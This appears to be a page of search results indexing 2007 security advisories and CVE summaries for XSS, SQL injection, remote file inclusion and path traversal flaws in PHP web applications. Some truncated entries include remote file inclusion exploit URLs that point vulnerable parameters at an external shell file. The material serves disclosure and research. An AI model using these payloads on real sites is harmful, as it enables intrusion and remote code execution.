7210 matches found
CVE-2007-4178
Cross-site scripting (XSS) vulnerability in index.php in WebDirector 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the deslocal parameter...
VietPHP Remote File Inclusion Vulnerability
VietPHP Remote File Inclusion Vulnerability Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...
vietphp-rfi.txt
VietPHP Remote File Inclusion Vulnerability Vuln. code : in: admin/index.php /index.php /functions DoRk: Powered by VietPHP Exploit: www.server.com/path/admin/index.php?language=Sh3LL www.server.com/index.php??language=Sh3LL www.server.com/functions.php?dirpath=Sh3LL...
WordPress Blue Memories Plugin <= 1.5 - XSS
Because of this vulnerability in index.php, attackers can inject arbitrary web script or HTML via the "s" parameter. Solution: Update the theme...
PT-2007-5361 · Xuyiyang · Blue Memories Theme
Cross-site scripting (XSS) vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown; th...
CVE-2007-4156
Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the (2) loginid parameter (uid variable), and possibly the (3) pwd parameter, to...
SQL injection
Multiple SQL injection vulnerabilities in wolioCMS allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to member.php in a page action, related to a SELECT statement in common.php; and the (2) loginid parameter (uid variable), and possibly the (3) pwd parameter, to...
CVE-2007-4141
OpenRat CMS 0.8-beta1 and earlier allows remote attackers to obtain sensitive information via a request containing an XSS sequence in the action parameter to index.php, which reveals the path in an error message...
CVE-2007-4117
Affected software: phpWebFileManager 0.5. The issue is described as a PHP remote file inclusion vulnerability in index.php via the PN_PathPrefix parameter, allowing remote code execution. The underlying cause is the handling of PN_PathPrefix in the index.php file, with the note that a reliable th...
PT-2007-5319 · Php · Phpwebfilemanager
Name of the Vulnerable Software and Affected Versions: phpWebFileManager version 0.5 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the PN_PathPrefix parameter in the index.php file. However, this issue is disputed by a reliable third party, who...
woliocms-sql.txt
wolioCMS - SQL Injection and Bypass Administrator Login Vendor : http://www.buton.web.id/member.php?member=anon Download : http://www.buton.web.id/download/woliocms.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg @irc.dal.net This exploit works if...
Madoa Poll v1.1 Remote File Include Vulnerabilities
Madoa Poll v1.1 Remote File Include Vulnerabilities ilker kandemir ilkerkandemiratmynet.com info: / Her$ey Vatan icin / Download: http://www.finnermark.se/madoa/Madoapoll11.zip TnX.: Ajann, Dumenci, H0tTurk, Str0ke Bug: require $Madoa . "config.php"; Exploit: index.php?Madoa=http://sheel.txt?...
Design/Logic Flaw
Webbler CMS before 3.1.6 provides the full installation path within HTML comments in certain documents, which allows remote attackers to obtain sensitive information by viewing the HTML source, as demonstrated by viewing the source generated from index.php...
SQL injection
Multiple SQL injection vulnerabilities in AlstraSoft Affiliate Network Pro allow remote attackers to execute arbitrary SQL commands via (1) the pgmid parameter in an uploadProducts action to merchants/index.php and possibly (2) the rowid parameter to merchants/temp.php...
CVE-2007-4046
SQL injection vulnerability in index.php in the Pony Gallery (com_ponygallery) 1.5 and earlier component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter...
CVE-2007-4046
CVE-2007-4046 is a SQL injection vulnerability in the Pony Gallery (com_ponygallery) for Joomla! 1.5 and earlier, exploitable via the catid parameter in index.php. Remote attackers could execute arbitrary SQL commands. Documents confirm affected software and an exploit/disclosure trail (e.g., exp...
CVE-2007-4028
CVE-2007-4028 affects Webspell 4.01.02. A vulnerability in index.php allows absolute path traversal, enabling remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. CVSS v2 base score 7.5 (HIGH): Network vector, no authentication, low attack compl...
CVE-2007-4028
Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information...
SQL injection
SQL injection vulnerability in index.php in bwired allows remote attackers to execute arbitrary SQL commands via the newsID parameter...